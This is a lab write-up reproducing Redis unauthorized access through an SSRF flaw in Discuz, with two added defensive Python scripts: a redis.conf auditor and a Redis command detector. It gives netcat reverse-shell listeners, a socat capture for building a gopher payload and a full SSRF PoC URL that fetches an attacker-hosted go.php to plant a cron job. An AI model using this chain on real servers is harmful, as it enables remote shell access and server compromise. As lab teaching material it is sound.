Unauthorized Access Vulnerabilities: Reproducing the Redis Vulnerability
Preface: the unauthorized-access vulnerability in this write-up is reached through SSRF (Server-Side Request Forgery). The server offers a feature that fetches resources and data from other servers but does not filter or restrict the target address, so the feature can be made to reach arbitrary servers and pull back data. The environment used for this reproduction is Discuz + Redis.
Principle of the Redis vulnerability
Redis binds to 0.0.0.0:6379 by default. If no password is set, or the password is weak, and no other effective protection is in place, a Redis server exposed to the public Internet can be accessed by anyone without authorization: reading data, obtaining resources, writing malicious files, and so on.
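The three conditions named above (listening on every interface, no or weak password, no other protection) can be checked directly in redis.conf. The following is an added example written for this article, not the post's own script: it parses a redis.conf text and reports those weaknesses, and separately decides whether an unauthenticated remote client would actually be accepted, which depends on how protected-mode interacts with bind and requirepass. The two configs at the bottom are constructed for illustration.

```python
"""Audit a redis.conf for the exposure conditions named in the article.

Added example, not the post's own script. The two configs at the bottom
are constructed; the directive semantics follow the documented behaviour
of redis.conf (bind, protected-mode, requirepass).
"""

# Passwords treated as weak: a constructed short list, extend with a real wordlist.
WEAK_PASSWORDS = {"redis", "123456", "password", "admin", "root", "foobared"}

# Address forms redis.conf accepts for "every interface".
WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*", "*-::*"}


def parse_conf(text):
    """Parse redis.conf-style text into {directive: [values in file order]}.

    Redis applies the last occurrence of a repeated directive, so callers take [-1].
    Comments and blank lines are skipped; surrounding double quotes are dropped.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        conf.setdefault(key.lower(), []).append(value.strip().strip('"'))
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the checked weaknesses is present."""
    conf = parse_conf(text)
    findings = []

    binds = conf.get("bind", [])
    addrs = binds[-1].split() if binds else []
    # No bind directive at all also means "listen on every interface".
    bind_all = not addrs or any(a.lstrip("-") in WILDCARD_BINDS for a in addrs)
    if bind_all:
        findings.append("bind: Redis listens on all interfaces (no bind directive or a wildcard address)")

    protected = conf.get("protected-mode", ["yes"])[-1].lower() == "yes"
    if not protected:
        findings.append("protected-mode no: remote clients are not refused even without bind/requirepass")

    password = conf.get("requirepass", [""])[-1]
    if not password:
        findings.append("requirepass: not set, any client that can connect may run any command")
    elif password.lower() in WEAK_PASSWORDS or len(password) < 12:
        findings.append("requirepass: weak password")

    return findings


def is_exposed(text):
    """True when an unauthenticated remote client would be accepted.

    protected-mode only refuses non-loopback clients when BOTH bind and
    requirepass are absent, so an explicit 'bind 0.0.0.0' defeats it.
    """
    conf = parse_conf(text)
    findings = audit_redis_conf(text)
    no_password = not conf.get("requirepass", [""])[-1]
    bind_all = any(f.startswith("bind:") for f in findings)
    protected = conf.get("protected-mode", ["yes"])[-1].lower() == "yes"
    protected_effective = protected and "bind" not in conf and no_password
    return bind_all and no_password and not protected_effective


# Constructed configs: the lab's weak setup and a hardened counterpart.
WEAK_CONF = """
bind 0.0.0.0
port 6379
protected-mode no
"""

HARDENED_CONF = """
bind 127.0.0.1 -::1
port 6379
protected-mode yes
requirepass "a-long-random-passphrase-for-this-example"
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "exposed" if is_exposed(conf) else "not exposed")
        for finding in audit_redis_conf(conf):
            print("  -", finding)
```

The distinction between audit_redis_conf and is_exposed matters in practice: a stock config with no bind line and no password still refuses remote clients because protected-mode is on, whereas the lab setup (explicit bind 0.0.0.0, protected-mode no) accepts anyone.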
Lab environment
Attacker machine: kali: 192.168.31.153
Test machine: centos7-1: 192.168.31.207
Target machine: centos7-2: 192.168.31.230
Required environment and script download: https://pan.baidu.com/s/1YE749PP1RcNGJYrpxMvE_A?pwd=xihw
Installing the Discuz + Redis environment
Setting up Discuz
On centos7-2, download and install Discuz. First set up the Apache server:
yum install -y httpd httpd-devel
service httpd.service start //start the Apache service
service httpd.service status //check Apache status
Install MySQL; on CentOS the MySQL package is MariaDB rather than MySQL.
yum -y install mariadb mariadb-server mariadb-libs mariadb-devel //install
service mariadb.service start //start the MariaDB service
service mariadb.service status //check status
netstat -an //check the listening ports
Install PHP and link PHP to MySQL:
yum install -y php
yum -y install php-mysql
Put the downloaded Discuz under /var/www/html and grant read and write permissions:
chown apache:apache -R upload/ //set the owning user and group
chmod -R 777 upload/ //grant read, write and execute permissions
service httpd.service restart //if httpd is already installed, just restart the service
service mariadb.service restart //same as above
service firewalld stop //stop the firewall so the site can be reached from the physical host
At this point everything shows as not writable; /etc/selinux/config must be modified, and after the change the VM is rebooted with reboot.
After the reboot, start the Apache and MariaDB services again; on the next visit the directories show as writable.
Setting up Redis
1. Download the Redis package, unpack it and enter the redis directory.
2. Run make to compile.
3. After compilation, enter the src directory.
4. Copy redis-cli and redis-server to /usr/local/bin so the Redis service can be run from any directory.
Run redis-server; if the following screen appears, the setup is half done. For the other half, open a new terminal and run redis-cli; if the output matches the second screenshot, the setup succeeded.
Reproducing the vulnerability
First, download and install the Redis environment on centos7-1, which is then used to test the script. This is the script I prepared in advance.
Have kali listen on port 6666: nc -lvnp 6666
On centos7-1 run bash aa.sh 127.0.0.1 6379, wait about a minute, and check whether kali has received the reverse shell.
The test succeeded. Next, inspect and delete the cron job on centos7-1, then use the socat port-forwarding tool (install it with yum install socat if it is missing) to capture the packets of the Redis attack, and finally build the PoC with the all-purpose gopher protocol.
Forward the traffic arriving on port 2222 to 6379:
socat -v tcp-listen:2222,fork tcp-connect:localhost:6379
bash aa.sh 127.0.0.1 2222
Write the captured packet into a file named mm.log. After pasting, and before saving, check that the file has fileformat=unix:
press Esc, then type :set ff; it should display fileformat=unix.
Next, a Python script is used to convert the saved capture into RESP format, which the all-purpose gopher protocol happens to support.
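The socat capture above and the RESP conversion both hinge on the same fact: everything a Redis client sends is either a RESP array of bulk strings (what redis-cli emits) or a plain inline line (what a script piping text into nc emits). The following is an added example for this article, not the post's script: it decodes such a client-side byte stream back into commands and flags the ones an unauthorized-access attack relies on, escalating a SAVE that follows a change of dir or dbfilename. The byte stream at the bottom is constructed to resemble what the capture shows; the paths in it are placeholders.

```python
"""Decode captured Redis client traffic and flag attack-relevant commands.

Added example, not the post's script. SAMPLE_CAPTURE is constructed:
RESP arrays (as sent by redis-cli) mixed with inline commands (as sent by
a script piping text into nc), with placeholder paths.
"""
import shlex

# (command prefix, reason), matched case-insensitively against the first tokens.
RULES = [
    (("CONFIG", "SET", "DIR"), "working directory changed; the next dump is written to an arbitrary path"),
    (("CONFIG", "SET", "DBFILENAME"), "dump file name changed"),
    (("SAVE",), "RDB dump written to disk"),
    (("BGSAVE",), "RDB dump written to disk"),
    (("FLUSHALL",), "all keys deleted"),
    (("SLAVEOF",), "replication repointed to another master"),
    (("REPLICAOF",), "replication repointed to another master"),
    (("MODULE", "LOAD"), "native module loaded from disk"),
]


def parse_resp_commands(data):
    """Return each client command in `data` as a list of str.

    Handles RESP arrays of bulk strings (an '*N' header, then N entries each
    introduced by '$len') and inline commands (a plain line ending in a
    newline), which together cover what Redis clients send.
    """
    cmds, i, n = [], 0, len(data)
    while i < n:
        if data[i:i + 1] == b"*":
            end = data.index(b"\r\n", i)
            count = int(data[i + 1:end])
            i = end + 2
            parts = []
            for _ in range(count):
                if data[i:i + 1] != b"$":
                    raise ValueError("expected bulk string at offset %d" % i)
                end = data.index(b"\r\n", i)
                length = int(data[i + 1:end])
                i = end + 2
                parts.append(data[i:i + length].decode("utf-8", "replace"))
                i += length + 2  # payload plus its trailing CRLF
            cmds.append(parts)
        else:
            end = data.find(b"\n", i)
            end = n if end == -1 else end
            line = data[i:end].strip().decode("utf-8", "replace")
            i = end + 1
            if line:
                try:
                    cmds.append(shlex.split(line))
                except ValueError:  # unbalanced quotes: fall back to whitespace split
                    cmds.append(line.split())
    return cmds


def flag_dangerous(cmds):
    """Return alerts for commands matching RULES.

    A SAVE or BGSAVE that follows a dir/dbfilename change is escalated to
    'high', because that sequence writes a file of the client's choosing.
    """
    alerts, dump_path_changed = [], False
    for cmd in cmds:
        head = [c.upper() for c in cmd[:3]]
        for pattern, reason in RULES:
            if head[:len(pattern)] != list(pattern):
                continue
            severity = "medium"
            if pattern[:2] == ("CONFIG", "SET"):
                dump_path_changed = True
            elif pattern[0] in ("SAVE", "BGSAVE") and dump_path_changed:
                severity = "high"
                reason += " outside the data directory (dir/dbfilename were changed earlier)"
            alerts.append({"command": " ".join(cmd), "reason": reason, "severity": severity})
            break
    return alerts


# Constructed capture: a benign PING and SET, then the config-then-save pattern.
SAMPLE_CAPTURE = (
    b"*1\r\n$4\r\nPING\r\n"
    b"*3\r\n$3\r\nSET\r\n$7\r\nsession\r\n$3\r\nabc\r\n"
    b"config set dir /tmp/placeholder-dir\n"
    b"config set dbfilename placeholder.txt\n"
    b"save\n"
)

if __name__ == "__main__":
    for alert in flag_dangerous(parse_resp_commands(SAMPLE_CAPTURE)):
        print(alert["severity"].upper(), alert["command"], "->", alert["reason"])
```

Run it against the client-side half of a socat -v capture (or a pcap-extracted stream) to see exactly which commands a script sent; the same parser is what any Redis-aware IDS rule needs in order to match on command names rather than raw bytes.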
Copy the code to kali, create a new file go.php, save and exit, then start the attack.
kali:
nc -lnvp 6666
PoC:
http://192.168.31.230/discuz/upload/forum.php?mod=ajax&action=downremoteimg&message=http://192.168.31.153/go.php?data=he2lo.jpg
Before running it, remember to start redis-server on centos7-2. A cron job then appears on centos7-2 and kali receives the reverse shell, so the reproduction succeeded; the IP shown is centos7-2's.